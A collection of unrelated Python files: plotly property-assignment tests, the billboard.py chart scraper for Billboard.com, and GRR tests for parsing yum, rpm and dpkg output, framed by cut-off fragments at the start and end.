for cj in list(self.advectiveFluxBoundaryConditionsSetterDict.keys())])
self.coefficients.initializeGlobalExteriorElementBoundaryQuadrature(self.timeIntegration.t, self.ebqe)
def estimate_mt(self):
pass
def calculateSolutionAtQuadrature(self):
pass
def calculateAuxiliaryQuantitiesAfterStep(self):
pass
| |
from unittest import TestCase
import plotly.graph_objs as go
from plotly.tests.utils import strip_dict_params
class TestAssignmentPrimitive(TestCase):
def setUp(self):
# Construct initial scatter object
self.scatter = go.Scatter(name="scatter A")
# Assert initial state
d1, d2 = strip_dict_params(
self.scatter, {"type": "scatter", "name": "scatter A"}
)
assert d1 == d2
# Construct expected results
self.expected_toplevel = {
"type": "scatter",
"name": "scatter A",
"fillcolor": "green",
}
self.expected_nested = {
"type": "scatter",
"name": "scatter A",
"marker": {"colorbar": {"title": {"font": {"family": "courier"}}}},
}
self.expected_nested_error_x = {
"type": "scatter",
"name": "scatter A",
"error_x": {"type": "percent"},
}
def test_toplevel_attr(self):
assert self.scatter.fillcolor is None
self.scatter.fillcolor = "green"
assert self.scatter.fillcolor == "green"
d1, d2 = strip_dict_params(self.scatter, self.expected_toplevel)
assert d1 == d2
def test_toplevel_item(self):
assert self.scatter["fillcolor"] is None
self.scatter["fillcolor"] = "green"
assert self.scatter["fillcolor"] == "green"
d1, d2 = strip_dict_params(self.scatter, self.expected_toplevel)
assert d1 == d2
def test_nested_attr(self):
assert self.scatter.marker.colorbar.titlefont.family is None
self.scatter.marker.colorbar.titlefont.family = "courier"
assert self.scatter.marker.colorbar.titlefont.family == "courier"
d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
assert d1 == d2
def test_nested_item(self):
assert self.scatter["marker"]["colorbar"]["title"]["font"]["family"] is None
self.scatter["marker"]["colorbar"]["title"]["font"]["family"] = "courier"
assert (
self.scatter["marker"]["colorbar"]["title"]["font"]["family"] == "courier"
)
d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
assert d1 == d2
def test_nested_item_dots(self):
assert self.scatter["marker.colorbar.title.font.family"] is None
self.scatter["marker.colorbar.title.font.family"] = "courier"
assert self.scatter["marker.colorbar.title.font.family"] == "courier"
d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
assert d1 == d2
def test_nested_item_tuple(self):
assert self.scatter["marker.colorbar.title.font.family"] is None
self.scatter[("marker", "colorbar", "title.font", "family")] = "courier"
assert self.scatter[("marker", "colorbar", "title.font", "family")] == "courier"
d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
assert d1 == d2
def test_nested_update(self):
self.scatter.update(
marker={"colorbar": {"title": {"font": {"family": "courier"}}}}
)
assert (
self.scatter[("marker", "colorbar", "title", "font", "family")] == "courier"
)
d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
assert d1 == d2
def test_nested_update_dots(self):
assert self.scatter["marker.colorbar.title.font.family"] is None
self.scatter.update({"marker.colorbar.title.font.family": "courier"})
assert self.scatter["marker.colorbar.title.font.family"] == "courier"
d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
assert d1 == d2
def test_nested_update_underscores(self):
assert self.scatter["error_x.type"] is None
self.scatter.update({"error_x_type": "percent"})
assert self.scatter["error_x_type"] == "percent"
d1, d2 = strip_dict_params(self.scatter, self.expected_nested_error_x)
assert d1 == d2
class TestAssignmentCompound(TestCase):
def setUp(self):
# Construct initial scatter object
self.scatter = go.Scatter(name="scatter A")
# Assert initial state
d1, d2 = strip_dict_params(
self.scatter, {"type": "scatter", "name": "scatter A"}
)
assert d1 == d2
# Construct expected results
self.expected_toplevel = {
"type": "scatter",
"name": "scatter A",
"marker": {"color": "yellow", "size": 10},
}
self.expected_nested = {
"type": "scatter",
"name": "scatter A",
"marker": {"colorbar": {"bgcolor": "yellow", "thickness": 5}},
}
def test_toplevel_obj(self):
d1, d2 = strip_dict_params(self.scatter.marker, {})
assert d1 == d2
self.scatter.marker = go.scatter.Marker(color="yellow", size=10)
assert isinstance(self.scatter.marker, go.scatter.Marker)
d1, d2 = strip_dict_params(
self.scatter.marker, self.expected_toplevel["marker"]
)
assert d1 == d2
d1, d2 = strip_dict_params(self.scatter, self.expected_toplevel)
assert d1 == d2
def test_toplevel_dict(self):
d1, d2 = strip_dict_params(self.scatter["marker"], {})
assert d1 == d2
self.scatter["marker"] = dict(color="yellow", size=10)
assert isinstance(self.scatter["marker"], go.scatter.Marker)
d1, d2 = strip_dict_params(
self.scatter.marker, self.expected_toplevel["marker"]
)
assert d1 == d2
d1, d2 = strip_dict_params(self.scatter, self.expected_toplevel)
assert d1 == d2
def test_nested_obj(self):
d1, d2 = strip_dict_params(self.scatter.marker.colorbar, {})
assert d1 == d2
self.scatter.marker.colorbar = go.scatter.marker.ColorBar(
bgcolor="yellow", thickness=5
)
assert isinstance(self.scatter.marker.colorbar, go.scatter.marker.ColorBar)
d1, d2 = strip_dict_params(
self.scatter.marker.colorbar, self.expected_nested["marker"]["colorbar"]
)
assert d1 == d2
d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
assert d1 == d2
def test_nested_dict(self):
d1, d2 = strip_dict_params(self.scatter["marker"]["colorbar"], {})
assert d1 == d2
self.scatter["marker"]["colorbar"] = dict(bgcolor="yellow", thickness=5)
assert isinstance(
self.scatter["marker"]["colorbar"], go.scatter.marker.ColorBar
)
d1, d2 = strip_dict_params(
self.scatter["marker"]["colorbar"],
self.expected_nested["marker"]["colorbar"],
)
assert d1 == d2
d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
assert d1 == d2
def test_nested_dict_dot(self):
d1, d2 = strip_dict_params(self.scatter.marker.colorbar, {})
assert d1 == d2
self.scatter["marker.colorbar"] = dict(bgcolor="yellow", thickness=5)
assert isinstance(self.scatter["marker.colorbar"], go.scatter.marker.ColorBar)
d1, d2 = strip_dict_params(
self.scatter["marker.colorbar"], self.expected_nested["marker"]["colorbar"]
)
assert d1 == d2
d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
assert d1 == d2
def test_nested_dict_tuple(self):
d1, d2 = strip_dict_params(self.scatter[("marker", "colorbar")], {})
assert d1 == d2
self.scatter[("marker", "colorbar")] = dict(bgcolor="yellow", thickness=5)
assert isinstance(
self.scatter[("marker", "colorbar")], go.scatter.marker.ColorBar
)
d1, d2 = strip_dict_params(
self.scatter[("marker", "colorbar")],
self.expected_nested["marker"]["colorbar"],
)
assert d1 == d2
d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
assert d1 == d2
def test_nested_update_obj(self):
self.scatter.update(
marker={
"colorbar": go.scatter.marker.ColorBar(bgcolor="yellow", thickness=5)
}
)
assert isinstance(
self.scatter["marker"]["colorbar"], go.scatter.marker.ColorBar
)
d1, d2 = strip_dict_params(
self.scatter["marker"]["colorbar"],
self.expected_nested["marker"]["colorbar"],
)
assert d1 == d2
d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
assert d1 == d2
def test_nested_update_dict(self):
self.scatter.update(marker={"colorbar": dict(bgcolor="yellow", thickness=5)})
assert isinstance(
self.scatter["marker"]["colorbar"], go.scatter.marker.ColorBar
)
d1, d2 = strip_dict_params(
self.scatter["marker"]["colorbar"],
self.expected_nested["marker"]["colorbar"],
)
assert d1 == d2
d1, d2 = strip_dict_params(self.scatter, self.expected_nested)
assert d1 == d2
class TestAssignmnetNone(TestCase):
def test_toplevel(self):
# Initialize scatter
scatter = go.Scatter(
name="scatter A",
y=[3, 2, 4],
marker={"colorbar": {"title": {"font": {"family": "courier"}}}},
)
expected = {
"type": "scatter",
"name": "scatter A",
"y": [3, 2, 4],
"marker": {"colorbar": {"title": {"font": {"family": "courier"}}}},
}
d1, d2 = strip_dict_params(scatter, expected)
assert d1 == d2
# Set property not defined to None
scatter.x = None
d1, d2 = strip_dict_params(scatter, expected)
assert d1 == d2
scatter["line.width"] = None
d1, d2 = strip_dict_params(scatter, expected)
assert d1 == d2
# Set defined property to None
scatter.y = None
expected.pop("y")
d1, d2 = strip_dict_params(scatter, expected)
assert d1 == d2
# Set compound properties to None
scatter[("marker", "colorbar", "title", "font")] = None
expected["marker"]["colorbar"]["title"].pop("font")
d1, d2 = strip_dict_params(scatter, expected)
assert d1 == d2
scatter.marker = None
expected.pop("marker")
d1, d2 = strip_dict_params(scatter, expected)
assert d1 == d2
class TestAssignCompoundArray(TestCase):
def setUp(self):
# Construct initial scatter object
self.parcoords = go.Parcoords(name="parcoords A")
# Assert initial state
d1, d2 = strip_dict_params(
self.parcoords, {"type": "parcoords", "name": "parcoords A"}
)
assert d1 == d2
# Construct expected results
self.expected_toplevel = {
"type": "parcoords",
"name": "parcoords A",
"dimensions": [
{"values": [2, 3, 1], "visible": True},
{"values": [1, 2, 3], "label": "dim1"},
],
}
self.layout = go.Layout()
self.expected_layout1 = {"updatemenus": [{}, {"font": {"family": "courier"}}]}
self.expected_layout2 = {
"updatemenus": [{}, {"buttons": [{}, {}, {"method": "restyle"}]}]
}
def test_assign_toplevel_array(self):
self.assertEqual(self.parcoords.dimensions, ())
self.parcoords["dimensions"] = [
go.parcoords.Dimension(values=[2, 3, 1], visible=True),
dict(values=[1, 2, 3], label="dim1"),
]
self.assertEqual(self.parcoords.to_plotly_json(), self.expected_toplevel)
def test_assign_nested_attr(self):
self.assertEqual(self.layout.updatemenus, ())
# Initialize empty updatemenus
self.layout.updatemenus = [{}, {}]
self.assertEqual(
self.layout["updatemenus"], (go.layout.Updatemenu(), go.layout.Updatemenu())
)
self.layout.updatemenus[1].font.family = "courier"
d1, d2 = strip_dict_params(self.layout, self.expected_layout1)
assert d1 == d2
def test_assign_double_nested_attr(self):
self.assertEqual(self.layout.updatemenus, ())
# Initialize empty updatemenus
self.layout.updatemenus = [{}, {}]
# Initialize empty buttons in updatemenu[1]
self.layout.updatemenus[1].buttons = [{}, {}, {}]
# Assign
self.layout.updatemenus[1].buttons[2].method = "restyle"
# Check
self.assertEqual(self.layout.updatemenus[1].buttons[2].method, "restyle")
d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
assert d1 == d2
def test_assign_double_nested_item(self):
self.assertEqual(self.layout.updatemenus, ())
# Initialize empty updatemenus
self.layout.updatemenus = [{}, {}]
# Initialize empty buttons in updatemenu[1]
self.layout["updatemenus"][1]["buttons"] = [{}, {}, {}]
# Assign
self.layout["updatemenus"][1]["buttons"][2]["method"] = "restyle"
# Check
self.assertEqual(
self.layout["updatemenus"][1]["buttons"][2]["method"], "restyle"
)
d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
assert d1 == d2
def test_assign_double_nested_tuple(self):
self.assertEqual(self.layout.updatemenus, ())
# Initialize empty updatemenus
self.layout.updatemenus = [{}, {}]
# Initialize empty buttons in updatemenu[1]
self.layout[("updatemenus", 1, "buttons")] = [{}, {}, {}]
# Assign
self.layout[("updatemenus", 1, "buttons", 2, "method")] = "restyle"
# Check
self.assertEqual(
self.layout[("updatemenus", 1, "buttons", 2, "method")], "restyle"
)
d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
assert d1 == d2
def test_assign_double_nested_dot(self):
self.assertEqual(self.layout.updatemenus, ())
# Initialize empty updatemenus
self.layout["updatemenus"] = [{}, {}]
# Initialize empty buttons in updatemenu[1]
self.layout["updatemenus.1.buttons"] = [{}, {}, {}]
# Assign
self.layout["updatemenus[1].buttons[2].method"] = "restyle"
# Check
self.assertEqual(self.layout["updatemenus[1].buttons[2].method"], "restyle")
d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
assert d1 == d2
def test_assign_double_nested_update_dict(self):
# Initialize empty updatemenus
self.layout.updatemenus = [{}, {}]
# Initialize empty buttons in updatemenu[1]
self.layout.updatemenus[1].buttons = [{}, {}, {}]
# Update
self.layout.update(updatemenus={1: {"buttons": {2: {"method": "restyle"}}}})
# Check
self.assertEqual(self.layout.updatemenus[1].buttons[2].method, "restyle")
d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
assert d1 == d2
def test_assign_double_nested_update_array(self):
# Initialize empty updatemenus
self.layout.updatemenus = [{}, {}]
# Initialize empty buttons in updatemenu[1]
self.layout.updatemenus[1].buttons = [{}, {}, {}]
# Update
self.layout.update(
updatemenus=[{}, {"buttons": [{}, {}, {"method": "restyle"}]}]
)
# Check
self.assertEqual(self.layout.updatemenus[1].buttons[2].method, "restyle")
d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
assert d1 == d2
def test_update_double_nested_dot(self):
self.assertEqual(self.layout.updatemenus, ())
# Initialize empty updatemenus
self.layout["updatemenus"] = [{}, {}]
# Initialize empty buttons in updatemenu[1]
self.layout["updatemenus.1.buttons"] = [{}, {}, {}]
# Update
self.layout.update({"updatemenus[1].buttons[2].method": "restyle"})
# Check
self.assertEqual(self.layout["updatemenus[1].buttons[2].method"], "restyle")
d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
assert d1 == d2
def test_update_double_nested_underscore(self):
self.assertEqual(self.layout.updatemenus, ())
# Initialize empty updatemenus
self.layout["updatemenus"] = [{}, {}]
# Initialize empty buttons in updatemenu[1]
self.layout["updatemenus_1_buttons"] = [{}, {}, {}]
# Update
self.layout.update({"updatemenus_1_buttons_2_method": "restyle"})
# Check
self.assertEqual(self.layout["updatemenus[1].buttons[2].method"], "restyle")
d1, d2 = strip_dict_params(self.layout, self.expected_layout2)
assert d1 == d2
| |
#!/usr/bin/env python
import datetime
import json
import re
import sys
from bs4 import BeautifulSoup
import requests
"""billboard.py: Unofficial Python API for accessing music charts from Billboard.com."""
__author__ = "Allen Guo"
__license__ = "MIT"
__maintainer__ = "Allen Guo"
__email__ = "guoguo12@gmail.com"
HEADERS = {
'User-Agent': 'billboard.py (https://github.com/guoguo12/billboard-charts)'
}
# css selector constants
_DATE_ELEMENT_SELECTOR = 'button.chart-detail-header__date-selector-button'
_PREVIOUS_DATE_SELECTOR = 'span.fa-chevron-left'
_NEXT_DATE_SELECTOR = 'span.fa-chevron-right'
_TOP_TITLE_SELECTOR = 'div.chart-number-one__title'
_TOP_ARTIST_SELECTOR = 'div.chart-number-one__artist'
_TOP_LAST_POS_SELECTOR = 'div.chart-number-one__last-week'
_TOP_WEEKS_SELECTOR = 'div.chart-number-one__weeks-on-chart'
_ENTRY_LIST_SELECTOR = 'div.chart-list-item'
_ENTRY_TITLE_ATTR = 'data-title'
_ENTRY_ARTIST_ATTR = 'data-artist'
_ENTRY_RANK_ATTR = 'data-rank'
# constants for the getPositionRowValue helper function
_ROW_SELECTOR_FORMAT = 'div.chart-list-item__%s'
_PEAK_POS_FORMAT = 'weeks-at-one'
_LAST_POS_FORMAT = 'last-week'
_WEEKS_ON_CHART_FORMAT = 'weeks-on-chart'
class BillboardNotFoundException(Exception):
pass
class BillboardParseException(Exception):
pass
class ChartEntry:
"""Represents an entry (typically a single track) on a chart.
Attributes:
title: The title of the track.
artist: The name of the track artist, as formatted on Billboard.com.
If there are multiple artists and/or featured artists, they will
be included in this string.
peakPos: The track's peak position on the chart at any point in time,
including future dates, as an int (or None if the chart does not
include this information).
lastPos: The track's position on the previous week's chart, as an int
(or None if the chart does not include this information).
This value is 0 if the track was not on the previous week's chart.
weeks: The number of weeks the track has been or was on the chart,
including future dates (up until the present time).
rank: The track's position on the chart, as an int.
isNew: Whether the track is new to the chart, as a boolean.
"""
def __init__(self, title, artist, peakPos, lastPos, weeks, rank, isNew):
self.title = title
self.artist = artist
self.peakPos = peakPos
self.lastPos = lastPos
self.weeks = weeks
self.rank = rank
self.isNew = isNew
def __repr__(self):
return '{}.{}(title={!r}, artist={!r})'.format(self.__class__.__module__,
self.__class__.__name__,
self.title,
self.artist)
def __str__(self):
"""Returns a string of the form 'TITLE by ARTIST'.
"""
if self.title:
s = u"'%s' by %s" % (self.title, self.artist)
else:
s = u"%s" % self.artist
if sys.version_info.major < 3:
return s.encode(getattr(sys.stdout, 'encoding', '') or 'utf8')
else:
return s
def json(self):
"""Returns the entry as a JSON string.
This is useful for caching.
"""
return json.dumps(self, default=lambda o: o.__dict__,
sort_keys=True, indent=4)
class ChartData:
"""Represents a particular Billboard chart for a particular date.
Attributes:
name: The chart name, as a string.
date: The date of the chart.
previousDate: The date of the previous chart, as a string in YYYY-MM-DD
format, or None if this information was not available.
entries: A list of ChartEntry objects, ordered by position on the chart
(highest first).
"""
def __init__(self, name, date=None, fetch=True, timeout=25):
"""Constructs a new ChartData instance.
Args:
name: The chart name, e.g. 'hot-100' or 'pop-songs'.
You can browse the Charts section of Billboard.com to find
valid chart names; the URL of a chart will look like
"http://www.billboard.com/charts/CHART-NAME".
date: The chart date, as a string in YYYY-MM-DD format.
By default, the latest chart is fetched.
If the argument is not a date on which a chart was published,
Billboard automatically rounds dates up to the nearest date on
which a chart was published.
If this argument is invalid, no exception will be raised;
instead, the chart will contain no entries.
fetch: A boolean indicating whether to fetch the chart data from
Billboard.com immediately (at instantiation time).
If False, the chart data can be populated at a later time
using the fetchEntries() method.
timeout: The number of seconds to wait for a server response.
If None, no timeout is applied.
"""
self.name = name
if date is not None and not re.match('\d{4}-\d{2}-\d{2}', str(date)):
raise ValueError('Date argument is not in YYYY-MM-DD format')
self.date = date
self.previousDate = None
self._timeout = timeout
self.entries = []
if fetch:
self.fetchEntries()
def __repr__(self):
return '{}.{}({!r}, date={!r})'.format(self.__class__.__module__,
self.__class__.__name__,
self.name, self.date)
def __str__(self):
"""Returns the chart as a human-readable string (typically multi-line).
"""
if not self.date:
s = '%s chart (current)' % self.name
else:
s = '%s chart from %s' % (self.name, self.date)
s += '\n' + '-' * len(s)
for n, entry in enumerate(self.entries):
s += '\n%s. %s' % (entry.rank, str(entry))
return s
def __getitem__(self, key):
"""Returns the (key + 1)-th chart entry; i.e., chart[0] refers to the
top entry on the chart.
"""
return self.entries[key]
def __len__(self):
"""Returns the number of entries in the chart.
A length of zero may indicated a failed/bad request.
"""
return len(self.entries)
def json(self):
"""Returns the entry as a JSON string.
This is useful for caching.
"""
return json.dumps(self, default=lambda o: o.__dict__,
sort_keys=True, indent=4)
def fetchEntries(self):
"""GETs the corresponding chart data from Billboard.com, then parses
the data using BeautifulSoup.
"""
if not self.date:
# Fetch latest chart
url = 'http://www.billboard.com/charts/%s' % (self.name)
else:
url = 'http://www.billboard.com/charts/%s/%s' % (
self.name, self.date)
req = requests.get(url, headers=HEADERS, timeout=self._timeout)
if req.status_code == 404:
message = "Chart not found (perhaps the name is misspelled?)"
raise BillboardNotFoundException(message)
req.raise_for_status()
soup = BeautifulSoup(req.text, 'html.parser')
dateElement = soup.select_one(_DATE_ELEMENT_SELECTOR)
if dateElement:
dateText = dateElement.text.strip()
self.date = datetime.datetime.strptime(dateText, '%B %d, %Y').strftime('%Y-%m-%d')
prevWeek = soup.select_one(_PREVIOUS_DATE_SELECTOR)
nextWeek = soup.select_one(_NEXT_DATE_SELECTOR)
if prevWeek and prevWeek.parent.get('href'):
self.previousDate = prevWeek.parent.get('href').split('/')[-1]
if nextWeek and nextWeek.parent.get('href'):
self.nextDate = nextWeek.parent.get('href').split('/')[-1]
try:
topTitle = soup.select_one(_TOP_TITLE_SELECTOR).string.strip()
except:
message = "Failed to parse top track title"
raise BillboardParseException(message)
try:
topArtistElement = soup.select_one(_TOP_ARTIST_SELECTOR) or ''
if topArtistElement == '':
topTitle, topArtist = '', topTitle
elif topArtistElement.a is None:
topArtist = topArtistElement.getText().strip()
else:
topArtist = topArtistElement.a.getText().strip()
except:
message = "Failed to parse top track artist"
raise BillboardParseException(message)
topRank = 1
if self.date:
topPeakPos = 1
try:
topLastPos = int(soup.select_one(_TOP_LAST_POS_SELECTOR).string.strip())
except:
# if there is no div with class div.chart-number-one__last-week, that means it was the top song the prior week
topLastPos = 1
topWeeksElement = soup.select_one(_TOP_WEEKS_SELECTOR)
topWeeks = int(topWeeksElement.string.strip()) if topWeeksElement is not None else 0
topIsNew = True if topWeeks == 0 else False
else:
topPeakPos = topLastPos = topWeeks = None
topIsNew = False
topEntry = ChartEntry(topTitle, topArtist, topPeakPos, topLastPos, topWeeks, topRank, topIsNew)
self.entries.append(topEntry)
for entrySoup in soup.select(_ENTRY_LIST_SELECTOR):
try:
title = entrySoup[_ENTRY_TITLE_ATTR].strip()
except:
message = "Failed to parse title"
raise BillboardParseException(message)
try:
artist = entrySoup[_ENTRY_ARTIST_ATTR].strip() or ''
except:
message = "Failed to parse artist"
raise BillboardParseException(message)
if artist == '':
title, artist = artist, title
try:
rank = int(entrySoup[_ENTRY_RANK_ATTR].strip())
except:
message = "Failed to parse rank"
raise BillboardParseException(message)
def getPositionRowValue(rowName):
try:
selector = _ROW_SELECTOR_FORMAT % rowName
selected = entrySoup.select_one(selector)
if selected is None or selected.string == '-':
return 0
else:
return int(selected.string.strip())
except:
message = "Failed to parse row value: %s" % rowName
raise BillboardParseException(message)
if self.date:
peakPos = getPositionRowValue(_PEAK_POS_FORMAT)
peakPos = rank if peakPos == 0 else peakPos
lastPos = getPositionRowValue(_LAST_POS_FORMAT)
weeks = getPositionRowValue(_WEEKS_ON_CHART_FORMAT)
isNew = True if weeks == 0 else False
else:
peakPos = lastPos = weeks = None
isNew = False
entry = ChartEntry(title, artist, peakPos, lastPos, weeks, rank, isNew)
self.entries.append(entry)
| |
#!/usr/bin/env python
"""Unit test for the linux cmd parser."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import os
from absl import app
from absl.testing import absltest
from typing import Sequence
from typing import Text
from grr_response_core.lib.parsers import linux_cmd_parser
from grr_response_core.lib.rdfvalues import anomaly as rdf_anomaly
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr.test_lib import test_lib
class YumListCmdParserTest(absltest.TestCase):
def testSimpleOutput(self):
output = """\
Installed Packages
foo.i386 3.14 @foo
bar.z80 2.71 @bar
java-1.8.0.armv8 1.41 @baz
"""
packages = self._Parse(output)
self.assertSequenceEqual(packages, [
rdf_client.SoftwarePackage.Installed(
name="foo", architecture="i386", publisher="@foo", version="3.14"),
rdf_client.SoftwarePackage.Installed(
name="bar", architecture="z80", publisher="@bar", version="2.71"),
rdf_client.SoftwarePackage.Installed(
name="java-1.8.0",
architecture="armv8",
publisher="@baz",
version="1.41"),
])
def testWrappedOutput(self):
output = """\
Installed Packages
foo.i386 3.14
@foo
bar.z80 2.71 @bar
baz.armv8
1.41 @baz
"""
packages = self._Parse(output)
self.assertSequenceEqual(packages, [
rdf_client.SoftwarePackage.Installed(
name="foo", architecture="i386", publisher="@foo", version="3.14"),
rdf_client.SoftwarePackage.Installed(
name="bar", architecture="z80", publisher="@bar", version="2.71"),
rdf_client.SoftwarePackage.Installed(
name="baz", architecture="armv8", publisher="@baz", version="1.41"),
])
def testRealOutput(self):
output = """\
Installed Packages
NetworkManager.x86_64 1:1.8.0-12.el7_4 @rhui-rhel-7-server-e4s-rhui-rpms
NetworkManager-config-server.noarch
1:1.8.0-12.el7_4 @rhui-rhel-7-server-e4s-rhui-rpms
NetworkManager-libnm.x86_64
1:1.8.0-12.el7_4 @rhui-rhel-7-server-e4s-rhui-rpms
NetworkManager-team.x86_64 1:1.8.0-12.el7_4 @rhui-rhel-7-server-e4s-rhui-rpms
NetworkManager-tui.x86_64 1:1.8.0-12.el7_4 @rhui-rhel-7-server-e4s-rhui-rpms
Red_Hat_Enterprise_Linux-Release_Notes-7-en-US.noarch
7-2.el7 @anaconda
cronie-anacron.x86_64 1.4.11-17.el7 @anaconda
crontabs.noarch 1.11-6.20121102git.el7
@anaconda
device-mapper.x86_64 7:1.02.140-8.el7 @anaconda
device-mapper-event.x86_64 7:1.02.140-8.el7 @rhui-rhel-7-server-e4s-rhui-rpms
device-mapper-event-libs.x86_64
7:1.02.140-8.el7 @rhui-rhel-7-server-e4s-rhui-rpms
device-mapper-libs.x86_64 7:1.02.140-8.el7 @anaconda
device-mapper-persistent-data.x86_64
0.7.0-0.1.rc6.el7_4.1
@rhui-rhel-7-server-e4s-rhui-rpms
dhclient.x86_64 12:4.2.5-58.el7_4.4 @rhui-rhel-7-server-e4s-rhui-rpms
dhcp-common.x86_64 12:4.2.5-58.el7_4.4 @rhui-rhel-7-server-e4s-rhui-rpms
"""
packages = self._Parse(output)
self.assertSequenceEqual(packages, [
rdf_client.SoftwarePackage.Installed(
name="NetworkManager",
architecture="x86_64",
version="1:1.8.0-12.el7_4",
publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
rdf_client.SoftwarePackage.Installed(
name="NetworkManager-config-server",
architecture="noarch",
version="1:1.8.0-12.el7_4",
publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
rdf_client.SoftwarePackage.Installed(
name="NetworkManager-libnm",
architecture="x86_64",
version="1:1.8.0-12.el7_4",
publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
rdf_client.SoftwarePackage.Installed(
name="NetworkManager-team",
architecture="x86_64",
version="1:1.8.0-12.el7_4",
publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
rdf_client.SoftwarePackage.Installed(
name="NetworkManager-tui",
architecture="x86_64",
version="1:1.8.0-12.el7_4",
publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
rdf_client.SoftwarePackage.Installed(
name="Red_Hat_Enterprise_Linux-Release_Notes-7-en-US",
architecture="noarch",
version="7-2.el7",
publisher="@anaconda"),
rdf_client.SoftwarePackage.Installed(
name="cronie-anacron",
architecture="x86_64",
version="1.4.11-17.el7",
publisher="@anaconda"),
rdf_client.SoftwarePackage.Installed(
name="crontabs",
architecture="noarch",
version="1.11-6.20121102git.el7",
publisher="@anaconda"),
rdf_client.SoftwarePackage.Installed(
name="device-mapper",
architecture="x86_64",
version="7:1.02.140-8.el7",
publisher="@anaconda"),
rdf_client.SoftwarePackage.Installed(
name="device-mapper-event",
architecture="x86_64",
version="7:1.02.140-8.el7",
publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
rdf_client.SoftwarePackage.Installed(
name="device-mapper-event-libs",
architecture="x86_64",
version="7:1.02.140-8.el7",
publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
rdf_client.SoftwarePackage.Installed(
name="device-mapper-libs",
architecture="x86_64",
version="7:1.02.140-8.el7",
publisher="@anaconda"),
rdf_client.SoftwarePackage.Installed(
name="device-mapper-persistent-data",
architecture="x86_64",
version="0.7.0-0.1.rc6.el7_4.1",
publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
rdf_client.SoftwarePackage.Installed(
name="dhclient",
architecture="x86_64",
version="12:4.2.5-58.el7_4.4",
publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
rdf_client.SoftwarePackage.Installed(
name="dhcp-common",
architecture="x86_64",
version="12:4.2.5-58.el7_4.4",
publisher="@rhui-rhel-7-server-e4s-rhui-rpms"),
])
@staticmethod
def _Parse(output):
parser = linux_cmd_parser.YumListCmdParser()
parsed = list(
parser.Parse(
cmd="yum",
args=["list installed"],
stdout=output.encode("utf-8"),
stderr=b"",
return_val=0,
knowledge_base=None))
return parsed[0].packages
class LinuxCmdParserTest(test_lib.GRRBaseTest):
"""Test parsing of linux command output."""
def testYumListCmdParser(self):
"""Ensure we can extract packages from yum output."""
parser = linux_cmd_parser.YumListCmdParser()
content = open(os.path.join(self.base_path, "yum.out"), "rb").read()
out = list(
parser.Parse("/usr/bin/yum", ["list installed -q"], content, "", 0,
None))
self.assertLen(out, 1)
self.assertLen(out[0].packages, 2)
package = out[0].packages[0]
self.assertIsInstance(package, rdf_client.SoftwarePackage)
self.assertEqual(package.name, "ConsoleKit")
self.assertEqual(package.architecture, "x86_64")
self.assertEqual(package.publisher, "@base")
def testYumRepolistCmdParser(self):
"""Test to see if we can get data from yum repolist output."""
parser = linux_cmd_parser.YumRepolistCmdParser()
content = open(os.path.join(self.base_path, "repolist.out"), "rb").read()
repolist = list(
parser.Parse("/usr/bin/yum", ["repolist", "-v", "-q"], content, "", 0,
None))
self.assertIsInstance(repolist[0], rdf_client.PackageRepository)
self.assertEqual(repolist[0].id, "rhel")
self.assertEqual(repolist[0].name, "rhel repo")
self.assertEqual(repolist[0].revision, "1")
self.assertEqual(repolist[0].last_update, "Sun Mar 15 08:51:32")
self.assertEqual(repolist[0].num_packages, "12")
self.assertEqual(repolist[0].size, "8 GB")
self.assertEqual(repolist[0].baseurl, "http://rhel/repo")
self.assertEqual(repolist[0].timeout,
"1200 second(s) (last: Mon Apr 1 20:30:02 2016)")
self.assertLen(repolist, 2)
def testRpmCmdParser(self):
"""Ensure we can extract packages from rpm output."""
parser = linux_cmd_parser.RpmCmdParser()
content = """
glib2-2.12.3-4.el5_3.1
elfutils-libelf-0.137-3.el5
libgpg-error-1.4-2
keyutils-libs-1.2-1.el5
less-436-9.el5
libstdc++-devel-4.1.2-55.el5
gcc-c++-4.1.2-55.el5
-not-valid.123.el5
"""
stderr = "error: rpmdbNextIterator: skipping h#"
out = list(parser.Parse("/bin/rpm", ["-qa"], content, stderr, 0, None))
# A package list and an Anomaly.
self.assertLen(out, 2)
anomaly = [o for o in out if isinstance(o, rdf_anomaly.Anomaly)]
self.assertLen(anomaly, 1)
package_lists = [
o for o in out if isinstance(o, rdf_client.SoftwarePackages)
]
self.assertLen(package_lists, 1)
package_list = package_lists[0]
self.assertLen(package_list.packages, 7)
software = {o.name: o.version for o in package_list.packages}
expected = {
"glib2": "2.12.3-4.el5_3.1",
"elfutils-libelf": "0.137-3.el5",
"libgpg-error": "1.4-2",
"keyutils-libs": "1.2-1.el5",
"less": "436-9.el5",
"libstdc++-devel": "4.1.2-55.el5",
"gcc-c++": "4.1.2-55.el5"
}
self.assertCountEqual(expected, software)
self.assertEqual("Broken rpm database.", anomaly[0].symptom)
def testDpkgCmdParser(self):
"""Ensure we can extract packages from dpkg output."""
parser = linux_cmd_parser.DpkgCmdParser()
content = open(os.path.join(self.base_path, "checks/data/dpkg.out"),
"rb").read()
